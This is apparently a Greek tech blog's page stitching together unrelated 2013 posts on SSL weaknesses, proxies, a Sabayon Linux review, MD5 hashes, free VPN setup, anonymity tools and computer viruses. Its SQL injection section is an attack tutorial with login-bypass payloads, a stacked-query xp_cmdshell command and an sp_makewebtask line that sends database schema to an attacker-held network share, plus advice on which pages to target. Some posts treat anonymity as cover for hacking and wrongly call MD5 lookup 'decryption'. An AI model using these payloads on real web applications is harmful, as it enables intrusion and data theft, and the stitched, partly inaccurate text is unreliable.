Η μεγαλύτερη αδυναμία του πρωτοκόλλου είναι η ευαισθησία των αλγόριθμων που χρησιμοποιούν μικρά κλειδιά. Συγκεκριμένα, οι RC4-40, RC2-40 και DES-56 εισάγουν σοβαρά προβλήματα ασφαλείας και θα πρέπει να αποφεύγονται.

Renegotiation of Session Keys (μόνο στην 2 έκδοση)

Από την στιγμή που μία σύνδεση δημιουργηθεί, το ίδιο master key χρησιμοποιείται καθ' όλη την διάρκεια της. Όταν το SSL χρησιμοποιείται πάνω από μια μακρόχρονη σύνδεση (π.χ. μιας TELNET εφαρμογής), η αδυναμία αλλαγής του master key γίνεται επικίνδυνη. Η καλύτερη μέθοδος επίλυσης αυτού του προβλήματος είναι η επαναδιαπραγμάτευση του κλειδιού σε τακτά χρονικά διαστήματα, μειώνοντας έτσι την πιθανότητα μιας επιτυχής Brute Force Attack.



Τι είναι οι proxy servers;

Proxy server είναι ένας server ο οποίος κρατάει στο δίσκο του sites τα οποία έχουν επισκεφθεί προηγούμενοι χρήστες. Χρησιμοποιώντας τον Proxy Server, η περιήγησή στο Internet γίνεται πιο γρήγορη διότι όταν "κατεβάζετε" μια σελίδα που βρίσκεται στο δίσκο του proxy, δεν λαμβάνετε τα δεδομένα από τον απομακρυσμένο υπολογιστή, αλλά τοπικά, από τον server της εταιρείας που σας παρέχει ίντερνετ και κατά συνέπεια με πολύ γρηγορότερο ρυθμό.
Η ανωνυμία είναι ένα από τα βασικά χαρακτηριστικά της ασφάλειας στο χώρο των υπολογιστών.Όσο πιο πολύ την διατηρούμε στο Internet τόσο περισσότερο ασφαλής είμαστε.
Υπάρχουν δύο τρόποι για να κρύψουμε την IP μας όταν κάνουμε περιήγηση στο Internet. Ο ένας είναι η χρησιμοποίηση proxy στον browser μας και ο άλλος μέσω κάποιων άλλων ιστοσελίδων που μας δίνουν την δυνατότητα να σερφάρουμε στο Internet ανώνυμα.
Αν λοιπόν δεν μπορούμε να βρούμε κάποιον διαθέσιμο proxy server για να κρατήσουμε την ανωνυμίας μας τότε μπορούμε να χρησιμοποιήσουμε κάποια από τις παρακάτω ιστοσελίδες. Το μόνο που χρειάζεται ουσιαστικά να κάνουμε είναι να βάλουμε την διεύθυνση της σελίδας που θέλουμε να μπούμε στο κενό πεδίο και να αρχίσουμε το σερφάρισμα.

Αυτή την επιλογή μας την προσφέρουν οι παρακάτω σελίδες:

Παρασκευή 25 Ιανουαρίου 2013

Sabayon 8 Μια διανομή για τους φανατικούς του Gentoo

Σε αυτό το άρθρο θα αναλύσουμε μια διανομή των linux αρκετά ενδιαφέρουσα ειδικά για τους "φανατικούς" του Gentoo. Θα έχετε ακούσει για το Gentoo, την διανομή που χτίζεται με βάση το hardware του υπολογιστή σας με αποτέλεσμα απίστευτη ταχύτητα λειτουργίας και σταθερότητα. Για να το χτίσει και να το συντηρεί κάποιος όμως θα πρέπει να διαβάσει πρώτα πολλές σελίδες οδηγιών, να έχει γνώσεις στο τερματικό και χρόνο για όλα τα compile που πρέπει να γίνονται κάθε φορά. Υπάρχει τρόπος λοιπόν να γνωρίσουμε την δύναμη του Gentoo σε ποιο “ανθρώπινο” περιβάλλον και λέγεται Sabayon! Προτείνω σε όσους δοκιμάσουν την νέα έκδοση του Sabayon να διαλέξουν από την αρχή την γλώσσα που θέλουν και να μην την αλλάξουν αργότερα.
Το Sabayon είναι μια διανομή βασισμένη στο Gentoo η οποία όμως προσφέρει κάποιες ευκολίες σε σχέση με αυτό, όπως για παράδειγμα έναν graphical installer για να κάνετε εγκατάσταση την διανομή με κλικ και όχι με εντολές, αλλά και πάρα πολλές χρήσιμες προεγκατεστημένες εφαρμογές και βιβλιοθήκες.


Το Sabayon είναι μια διανομή που κύριο στόχο έχει να προσφέρει ένα σύστημα που συνδυάζει τελευταία τεχνολογία και σταθερότητα με επιτυχία. Αυτό ακούγεται δύσκολο και είναι δύσκολο. Το κατα πόσον το πετυχαίνουν όμως θα πρέπει να μας το πει κάποιος που το χρησιμοποιεί καιρό. Εγώ, μετά από μισή ώρα χρήσης, μάλλον είμαι ακατάλληλος να μιλήσω για σταθερότητα. Από την έκδοση 7 στην 8 έγινε δουλειά πάνω σε πακέτα που χρησιμοποιούνται για μεταγλωττίσεις, εξασφαλίζοντας ακόμα καλύτερες επιδόσεις, καθώς επίσης και δουλειά πάνω σε θέματα διαχείρισης φόρτου συστήματος και θεμάτων διαχείρισης ενέργειας. Επίσης το default filesystem είναι πλέον το btrfs. Όπως είναι φυσικό η έκδοση 8 έρχεται με τις τελευταίες εκδόσεις προγραμμάτων, εφαρμογών, DE κλπ.


Οι διαθέσιμες εκδόσεις είναι οι εξής:
  • Gnome 3.2.2
  • KDE 4.7.4 (το 4.8 θα είναι διαθέσιμο σε λίγες μέρες, ενώ υπάρχει ήδη στο testing repo της διανομής)
  • Xfce 4.8
  • Spin Base (“γυμνή” έκδοση για το κτίσιμο των δικών σαν iso)
  • Server Base (με server-optimizations στον πυρήνα)
  • Core CDX (με Fluxbox)
Αναφέρω την ύπαρξη του Cinnamon, αλλά και του Razor Qt στα repos της διανομής. Επίσης για όποιον έχει κέφια, θα βρει στα testing repos και πειραματικούς πυρήνες “Fusion” για τους οποίους δεν έχω άποψη. Σημαντική λεπτομέρεια επίσης αποτελεί η ύπαρξη προεγκατεστημένων drivers για κάρτες γραφικών και codecs για κάθε μορφής αρχείου πολυμέσων.
Το Sabayon προσφέρει την δύναμη του Gentoo, χωρίς να χρειάζεται να κάνετε compile τίποτα. Είναι απόλυτα συμβατό με το Gentoo (portage), ενώ στα δικά του repos θα βρείτε 12000 πακέτα!

Ελάχιστες και προτεινόμενες απαιτήσεις:

  • Intel Pentium II ή AMD Athlon. Προτείνεται Intel Core 2 Duo ή AMD 64 X2
  • 512ΜΒ RAM για Gnome ή 768MB για KDE. Προτείνεται 1GB RAM
  • 8GB ελεύθερου χώρου στο δίσκο. Προτείνονται 15GB
  • Κάρτα γραφικών με υποστήριξη 2D. Προτείνεται κάρτα γραφικών με υποστήριξη 3D
  • Οδηγός DVD

SQL injection

Σε αυτό το tutorial θα ασχοληθούμε με τη μέθοδο των SQL injections όπου οι κακόβουλοι χρήστες επιδιώκουν να εκμεταλλευτούν ευπάθειες στην ασφάλεια μιας εφαρμογής web, ώστε να επέμβουν στα δεδομένα της βάσης. Ως μέθοδος επίθεσης δεν είναι νέα ούτε πολύπλοκη. Για την εφαρμογή των SQL injections αρκεί απλά ένας web browser και κοινή λογική – έτσι οι επιθέσεις SQL injections εμφανίστηκαν ταυτόχρονα με τις πρώτες εφαρμογές web.
Σε αυτό το μέρος του άρθρου θα ασχοληθούμε με την παρουσίαση των SQL injections – τί είναι και πώς γίνονται, με σκοπό την κατανόηση του προβλήματος. Σε επόμενη ανάρτηση θα δούμε τρόπους αντιμετώπισης του προβλήματος, δηλαδή πώς μπορούμε να αποφύγουμε τη συγκεκριμένη ευπάθεια σε εφαρμογές web που αναπτύσσουμε.
Σκοπός των επίθεσεων SQL injections είναι η εκμετάλλευση συγκεκριμένων αδυναμιών μιας εφαρμογής web, ώστε να εκτελεστούν στη βάση δεδομένων επερωτήσεις SQL (SQL queries) που δεν έχουν προβλεφθεί από τους προγραμματιστές.
Παραδείγματα τέτοιων επερωτήσεων είναι η προβολή (SELECT) δεδομένων που δεν έχει προβλεφθεί να προβάλλονται στους χρήστες, η ανεξέλεγκτη εισαγωγή (INSERT) δεδομένων στη βάση και η διαγραφή (DELETE) δεδομένων από τη βάση.
Παρά το αυξημένο ρίσκο, θεωρείται σήμερα μεγάλος ο αριθμός των συστημάτων τα οποία είναι ευάλωτα στις επιθέσεις SQL Injections. Το ευχάριστο είναι ότι ως απειλή εύκολα μπορεί να διερευνηθεί σε μια εφαρμογή και με κατάλληλη πρόβλεψη να αποφευχθεί.

Πως γίνεται;

Στα SQL injections ένας κακόβουλος χρήστης προσπαθεί να εκμεταλλευτεί την ελλιπή ή λανθασμένη επαλήθευση (validation) των δεδομένων εισόδου (input data) μιας εφαρμογής. Τυπικά η ευπάθεια των SQL injections μπορεί να εμφανίζεται και σε μη web εφαρμογές, όμως εκεί είναι σαφώς πιο σπάνιο. Συνήθεις τρόποι όπου οι χρήστες δίνουν δεδομένα εισόδου σε μια εφαρμογή web είναι οι φόρμες (με τις μεθόδους HTTP GET και POST) και τα links (μέθοδος HTTP GET). Στην περίπτωση ελλιπούς επαλήθευσης των δεδομένων εισόδου είναι σε κάποιες περιπτώσεις δυνατόν να περαστούν extra εντολές SQL προς εκτέλεση στην εφαρμογή ή να αλλαχτούν μέρη μιας επερώτησης SQL με τρόπο που δεν έχει προβλεφθεί.

Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;

Απλά έναν web browser.

Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;

Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.

Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;

Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:


Αλλά γιατί ' or 1=1--;

Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως


Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:

v_cat = request(“category")
sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”
set rs=conn.execute(sqlstr)

Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:

SELECT * FROM hardwr WHERE PCategory=’hardware’

όπου το query θα φέρει πίσω αποτελέσματα για το hardware.
Οπότε σε αυτή την περίπτωση αν πάρουμε το url

Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε

SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘

Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).
Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε ‘ or 'a'='a

Οπότε το SQL query θα γίνει:

SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’

Και θα έχουμε το ίδιο αποτέλεσμα. Αντίστοιχα μπορείτε να δοκιμάσετε:
‘ or 1=1--
“ or 1=1--
or 1=1--
‘ or ‘a’=’a
“ or “a”=”a
‘) or (‘a"=‘a

Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;

Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Νάσο;)

'; exec master..xp_cdmshel ‘ping 10.10.1.2'--

Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό. Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:
#tcpdump icmp
Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.

Πως μπορώ να πάρω το αποτέλεσμα του query μου;

Με την χρήση του sp_makewebtask:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"
αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.

Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ.

Αν θέλετε να μάθετε περισσότερα για SQL Injection διαβάστε βιβλία που κυκλοφορούν στο διαδίκτυο ή δείτε τα παρακάτω link…


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τι είναι τα MD5 hashes και πως αποκρυπτογραφούνται

Σε αυτό το tutorial θα σας δείξω πώς να "σπάσετε" τα MD5 hash. Πρώτα απ' όλα για όσους δε γνωρίζουν το md5 hash (Message-Diggest algorithm 5) είναι ένας αλφόριθμος κρυπτογράφισης 128-bit. Αυτό το md5 είναι για να μπορείτε εσείς ο τελικός χρήστης να κάνετε επαλήθευση του αρχείου αυτού ώστε να επιβεβαιώσετε αν έχει κατέβει σωστά ή καλύτερα αν είναι πραγματικά "αυτό" το αρχείο και όχι κάποιο άλλο παραλαγμένο, μπορεί από το "κατέβασμα" ή από κάποιον χρήστη που έχει αλλάξει τον κώδικά του.
Επίσης σε αυτόν τον οδηγό θα μάθετε πως να κάνετε κι εσείς ένα τέτοιο MD5 αρχείο ώστε να μπορείτε να προσφέρετε την δυνατότητα και σε άλλους τελικούς χρήστες να επιβεβαιώνουν την εγκυρότητα του/των αρχείων σας. Απαραίτητη προυπόθεση είναι να έχετε εγκατεστημένο το εργαλείο md5sum που έρχεται συνήθως με κάθε "σωστή" διανομή. Tο πιο πιθανό να μην χρειαστεί να το εγκαταστήσετε. Για να δείτε αν το έχετε απλά κάντε whatis md5sum αν σας επιστρέψει το παρακάτω μήνυμα:
    "md5sum (1) - compute and check MD5 message digest"
    τότε είστε ready to go!!
Δεν είναι δύσκολο δείτε και από μόνοι σας.

Επαλήθευση με χρήση ενός MD5sum αρχείου:

Αν έχουμε ένα αρχείο π.χ. "file.iso" τότε θα υπάρχει και το αρχείο "file.iso.md5" το οποίο περιέχει πληροφορίες για ένα ή περισσότερα ζεύγη αρχείων και της MD5 τιμές τους. Τα περισσότερα αναφέρονται στο "file.iso.md5" και πρέπει να είναι στον ίδιο φάκελο με το αρχείο που θα γίνει η επαλήθευση δλδ το "file.iso"
    md5sum -cv file.iso.md5

Δημιουργία ενός MD5sum αρχείου

Καταρχάς καλό θα ήταν να έχουμε το αρχείο σε ένα φάκελο π.χ. δλδ να το αντιγράψουμε προσωρινά για να μπορούμε εύκολα να κάνουμε την δημιουργία.. ας υποθέσουμε ότι έχουμε το αρχείο "archive.tar.gz" και κάνουμε την εξής εντολή md5sum archive.tar.gz > archive.tar.gz.md5. Αυτό ήταν!
Με τον πρώτο τρόπο μπορείτε να κάνετε μια δοκιμή και να επαληθεύσετε το αρχείο που δημιουργήσατε με τον δεύτερο τρόπο.
Είναι πολύ χρήσιμο για αρχεία τα οποία είναι σοβαρά για το σύστημά σας. π.χ. ένα iso ενός linux distro..!!

Αποκρυπτογράφηση με χρήση σελιδας online

Ο πιο εύκολος τρόπος για να αποκρυπτογραφήσετε ένα MD5 hash είναι να επισκεφτείτε την παρακάτω ιστοσελίδα:

Εγκατάσταση VPN σύνδεσης χωρίς συνδρομή σε Ubuntu

 
Οι VPN (Virtual Private Network) συνδέσεις γίνονται όλο και πιο συνηθισμένες για αυτούς που θέλουν υψηλότερο βαθμό ασφάλειας στο Διαδίκτυο. Βλέπεται με το VPN όλη η διαδικτυακή μας κίνηση κρυπτογραφείται, με αποτέλεσμα η περιήγηση στο World Wide Web να είναι πάντα ασφαλής ανεξάρτητα ή όχι αν χρησιμοποιείται ssl security.
Έτσι ακόμα κι αν είστε ένας συνηθισμένος χρήστης του διαδικτύου ή ένας heavy torrent downloader user μπορείτε να δοκιμάσετε το VPN τόσο για να αποκρύψετε τα ευαίσθητα δεδομένα σας από τα μάτια των άλλων (ISPs, Googlebots κλπ) όσο και να κάνετε bypass τους όποιους γεωγραφικούς περιορισμούς (πχ να δείτε μια σειρά του ABC online, την στιγμή που μεταδίδεται στις ΗΠΑ ).

Ποιον VPN πάροχο να διαλέξω;

Υπάρχουν πολλοί πάροχοι VPN, για να επιλέξετε προσωπικά θα συνιστούσα να δοκιμάσετε κάποια Free trial σύνδεση προτού δεσμευτείτε με μηνιαία συνδρομή καθώς ναι μεν μπορεί να κοστίζει μόλις λίγα ευρώ τον μήνα αλλά από την άλλη καλό είναι πάντα να δοκιμάζετε τον VPN server της αρεσκείας σας για να δείτε αν σας εξυπηρετεί. Το να στήσετε στο pc σας VPN, δεν είναι δύσκολο αρκεί να ακολουθήσετε τις οδηγίες του εκάστοτε VPN provider.
Παρακάτω θα δούμε πως μπορούμε να έχουμε πρόσβαση στο SecurityKiss έναν από τους πιο αξιόπιστους Free VPN servers που έχω δοκιμάσει.

Ρύθμιση VPN σε Ubuntu


Ανοίγετε έναν νέο λογαριασμό στο SecurityKiss όπου δίνετε το email σας. Μετά από ελάχιστα δευτερόλεπτα θα σας έρθει email με τα στοιχεία της σύνδεσης σας.

ΠΡΟΣΟΧΗ!! Αν δεν το βρείτε στο inbox ελέγξτε το Spam Folder σας. Το πιο πιθανό είναι το μηνυμα εγγραφής σας να βρίσκεται στον Spam Folder του mail σας.


Πηγαίνετε στις ρυθμίσεις δικτύου και επιλέξετε με το "+" την δημιουργία μιας νέας σύνδεσης για το δίκτυό σας.

 

Στη συνέχεια, ένα νέο παράθυρο θα εμφανιστεί για να επιλέξετε τον τύπο του interface – επιλέξτε VPN.


Στη συνέχεια, επιλέξτε τον τύπο VPN – επιλέξτε PPTP (Point to Point Tunneling Protocol).


Στις ρυθμίσεις του VPN προσθέσετε τα στοιχεία του λογαριασμού σας (αυτά που έχετε λάβει με το email).


Μετά επιλέξτε ρυθμίσεις για προχωρημένους (Advanced Settings) και ενεργοποιήστε το MPPE.

 

Αυτό ήταν έχετε πλέον την δυνατότητα να απολαύσετε την ασφάλεια του VPN

Σημείωση: Η χρήση vpn μπορεί να επιβραδύνει την πλοήγηση και δεν συνιστάται όταν η ταχύτητα της σύνδεσής σας είναι πολύ αργή.

Τέλος για να συνδεθήτε στο vpn μπαίνετε στη σελίδα του vpn στο λογαριασμό που φτιάξατε επιλέγεται έναν server από αυτούς που έχει στη λίστα αντιγράφετε την ΙΡ του και στη συνέχεια τον βάζετε στη gateway της σύνδεσης vpn που φτιάξατε με την προηγούμενη διαδικασία στις συνδέσεις δικτύου. Το συγκεκριμένο vpn δηλαδή της εταιρίας securitykiss είναι free αλλά έχει τον περιορισμό να σας δίνει μέχρι 300ΜΒ/24 ώρες. Αν τώρα γίνεται συνδρομητές δίνοντας κάθε μήνα το ποσό που ζητείται εννοείτε πως δε θα έχετε περιορισμούς στη σύνδεση σας αλλά πολύ περισσότερο θα έχετε και περισσότερα οφέλη όσον αφορά την ταχύτητα και την ασφάλεια σας.

Πέμπτη 24 Ιανουαρίου 2013

Μείνετε ανώνυμοι εντός και εκτός διαδικτύου...

Σε αυτό το tutorial θα σας δείξω πώς να παραμείνετε ανώνυμοι στο διαδίκτυο. Σήμερα η ανωνυμία είναι σπουδαίο πλεονέκτημα του καθενός ειδικά μετά από την εφαρμογή των διατάξεων CISPA, SOPA κτλ κυρίως σε χώρες του εξωτερικού. Έτσι λοιπόν σε αυτό το tutorial θα σας δείξω δυο τρόπους προστασίας.
Α) Online Προστασία
Β) Offline Προστασία

Πρώτα θα αναλύσουμε την offline προστασία. Να θυμάστε ότι η offline προστασία είναι πολύ σημαντική ειδικά σε περιπτώσεις που κάποιος θέλει να προβεί σε ενέργειες hacking.

Α) Offline Προστασία
Με τον όρο offline προστασία εννοούμε την προστασία του προσωπικού μας υπολογιστή από κάθε ιό, δούρειο ίππο, σκουλήκια (worms), keyloggers κτλ. Επίσης εννοούμε και την κρυπτογράφηση κάθε μορφής προσωπικού δεδομένου αλλά και την προστασία του υπολογιστή με usernames/passwords έτσι ώστε να μη μπορεί ο καθένας να πάρει προσωπικά μας δεδομένα.

  • Malwarebytes' Anti-Malware
Πρόκειται για μια χρήσιμη εφαρμογή στον υπολογιστή που εντοπίζει και αφαιρεί malwares.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:

  • KeyScrambler
To KeyScrambler είναι μια άλλη χρήσιμη εφαρμογή με την οποία μπορείτε να κρυπτογραφήσετε ή αλλιώς να ενισχύσετε την ισχύ των κλειδιών - κωδικών σας.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • COMODO firewall
Χρησιμοποιήστε το COMODO firewall. Ειδικά αν κάποιος ασχολείται με τον τομέα του  penetration testing το comodo είναι ένα απαραίτητο εργαλείο.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • TrueCrypt
Προστατέψτε τα προσωπικά σας αρχεία χρησιμοποιώντας το TrueCrypt.  Πρόκειται για μια εφαρμογή ανοιχτού κώδικα που απευθήνεται σε λειτουργικά συστήματα Windows 7/Vista/XP, Mac OS X, και Linux.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • VMWare Player
Για penetration testing χρησιμοποιήστε αυτό το πρόγραμμα σύμφωνα με το οποίο μπορείτε να τρέξετε ένα LiveCD λειτουργικό σύστημα ενώ παράλληλα είστε για παράδειγμα στα Windows.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  • DeepFreeze
To DeepFreeze είναι ένα εργαλείο που αποτρέπει κάθε είδους κοινής επίθεσης στον υπολογιστή σας. Κάντε τον υπολογιστή σας αδιαπέραστο σε επιθέσεις.
Για περισσότερες πληροφορίες
 μπορείτε να ανατρέξετε στο site:
  • TMAC
Technitium MAC Address Changer άλλάζει τη MAC διεύθυνση του υπολογιστή σας.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
http://www.technitium.com/tmac/index.html

  • CCleaner
Το CCleaner είναι ένα χρήσιμο εργαλείο για κάθε υπολογιστή. Μπορεί να χρησιμοποιηθεί για να κάνει μια γενική εκκαθάριση στο σκληρό δίσκο του υπολογιστή σας διαγράφοντας αρχεία, καθαρίζοντας τα temporary files, cache κτλ.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:
  •  Flash Cookie Remover
Διαγράψτε τα κακόβουλα browser cookies από κάθε περιήγηση σας στο διαδίκτυο.
Για περισσότερες πληροφορίες μπορείτε να ανατρέξετε στο site:

Β) Online Προστασία
Αυτού του είδους η προστασία είναι εξίσου και περισσότερο σημαντική από την εκτός σύνδεσης προστασία.
Είδη Online Protection
  • VPN(s)
  • Proxies
  • Tor
  • SSH Tunneling

VPN (Virtual Private Network)

Το VPN είναι ένα εικονικό ιδιωτικό δίκτυο που παρέχει έναν ασφαλή τρόπο σύνδεσης στο ίντερνετ αποκρύπτοντας την ΙΡ του υπολογιστή.

Free VPNs
  • Cyberghost
  • HotSpot Shield
  • Pro XPN
  • Open VPN

Paid VPNs
  • nVPN
  • SwissVPN
HTTP Proxies και SOCKS5

Proxies

SSH Tunneling

Πράγματα που πρέπει να σκεφτείτε για SSH Tunneling.
  • PuTTy
  • Firefox
Βήματα:

1. Ανοίγω το PuTTy
2. Τοποθετώ την ΙΡ μου στο Hostname ή την ΙΡ διεύθυνση στο κενό
3. Επιλέγω το σύμβολο "+"SSH
4. Επιλέγω tunnels
5. Επιλέξτε port και κάντε κλικ στο "Dynamic"
6. Κάντε κλικ στο Add για να ανοίξετε μια σύνδεση.
7. Τώρα πάμε στο browser proxy settings βάζουμε 127.0.0.1 για ΙΡ και βάζουμε port.



Τέλος αποθηκεύουμε τις αλλαγές και κλείνουμε το παράθυρο και η ρυθμίσεις μας έγιναν.

Ιοί υπολογιστών, κατηγορίες και αντιμετώπιση

Σε αυτή την ενότητα θα δούμε τι είναι ο ιός σε έναν υπολογιστή. Ο ιός υπολογιστών είναι ένα πρόγραμμα γραμμένο αποκλειστικά για να αλλάζει τον τρόπο που λειτουργεί ο υπολογιστής σας, χωρίς την άδεια σας και
χωρίς να το γνωρίζετε.
Η πρώτη αναφορά στον όρο «Ιός υπολογιστή» έγινε το 1985, όταν ο Fred Cohen, μεταπτυχιακός φοιτητής του Πανεπιστημίου της Νότιας Kαλιφόρνια, αποφάσισε να ονομάσει τα αυτο αναπαραγόμενα προγράμματα «computer viruses» (ιοί υπολογιστών). O Cohen είχε ακολουθήσει την υπόδειξη του καθηγητή του, που με τη σειρά του είχε επηρεαστεί από μια σειρά διηγημάτων επιστημονικής φαντασίας του David Gerrold από τη δεκαετία του '70 με τον τίτλο «When HARLIE was one». Ο ίδιος ο Cohen όρισε αργότερα τον ιό υπολογιστών ως "μια ακολουθία συμβόλων, τα οποία με τη μετάφρασή τους σε ένα δεδομένο περιβάλλον προκαλούν τη μεταβολή άλλων ακολουθιών συμβόλων ούτως ώστε να περιέχουν τμήμα της αρχικής ακολουθίας".
Γενικά υποστηρίζεται σήμερα ότι ένα πρόγραμμα μπορεί να ονομαστεί ιός αν έχει τα ακόλουθα χαρακτηριστικά:
  • Προκαλεί τη μεταβολή άλλου λογισμικού, εισάγοντας το δικό του κώδικα μέσα σε αυτό.
  • Έχει την ιδιότητα να προκαλεί τέτοιου είδους μεταβολές σε περισσότερα του ενός προγράμματα.
  • Έχει τη δυνατότητα να αναγνωρίζει τις μεταβολές που το ίδιο προξένησε σε άλλα προγράμματα.
  • Έχει τη δυνατότητα να παρεμποδίζει την περαιτέρω μεταβολή(μόλυνση) αυτών των προγραμμάτων.
    Τα προγράμματα που έχουν προσβληθεί αποκτούν, με τη σειρά τους, όλα τα προαναφερθέντα χαρακτηριστικά.
 

Κατηγορίες ιών

  • Trojan Horses ή Δούρειοι Ίπποι

Στην περίπτωση αυτή έχουμε ένα τμήμα ανεπιθύμητου κώδικα κρυμμένου μέσα σε ένα τμήμα επιθυμητού κώδικα. Προμηθεύεστε, δηλαδή, ένα πρόγραμμα το οποίο εκτελεί ή υποστηρίζει ότι εκτελεί μια επιθυμητή λειτουργία και μόλις το χρησιμοποιήσετε (είτε αμέσως είτε μόλις ικανοποιηθεί μια λογική ή χρονική συνθήκη), αυτό κάνει και κάτι άλλο, συνήθως επιτρέπει την πρόσβαση σε τρίτους στον μολυσμένο υπολογιστή ή προκαλεί καταστροφές στα αρχεία του.
  • Viruses ή Ιοί

Πρόκειται για έναν ειδικό τύπο Trojan Horse, ο οποίος έχει την ικανότητα να προσαρτά τον κώδικά του σε άλλα τμήματα κώδικα, να αναπαράγει τον εαυτό του και να πολλαπλασιάζεται, καθώς και να εκτελεί κάποια καταστροφική ή ουδέτερη λειτουργία.

  • Worms ή Σκουλήκια

Αυτά μοιάζουν με τους ιούς, καθώς δεν επιτελούν καμία χρήσιμη ή επιθυμητή λειτουργία και επιπλέον μπορούν να παράγουν ακριβή αντίγραφα του εαυτού τους. Διαφέρουν, όμως στο ότι αποτελούν ανεξάρτητα και αυτόνομα προγράμματα και επιχειρούν ενεργά να διασπείρουν τον εαυτό τους και τα αντίγραφά τους μέσα σε ένα περιβάλλον δικτύου. Στόχος ενός Worm δεν είναι να προκαλέσει κάποια συγκεκριμένη ζημιά. Απλώς, με τον συνεχή πολλαπλασιασμό του, απασχολεί όλο και περισσότερους από τους πόρους (resources) του συστήματος, καθιστώντας το τελικά ανίκανο να λειτουργήσει
κανονικά.

Πως μεταδίδονται οι ιοί

Οι τρόποι με τους οποίους μπορεί ένας ιός να μεταδοθεί είναι πολλοί. Τρεις είναι αυτοί που χρησιμοποιούνται πιο συχνά:
Ανταλλαγή αρχείων: Μεταφέροντας αρχεία με δισκέτα ή με CD από υπολογιστή σε υπολογιστή ο ιός μεταδίδεται, εφ' όσον ο αρχικός
υπολογιστής ήταν μολυσμένος.
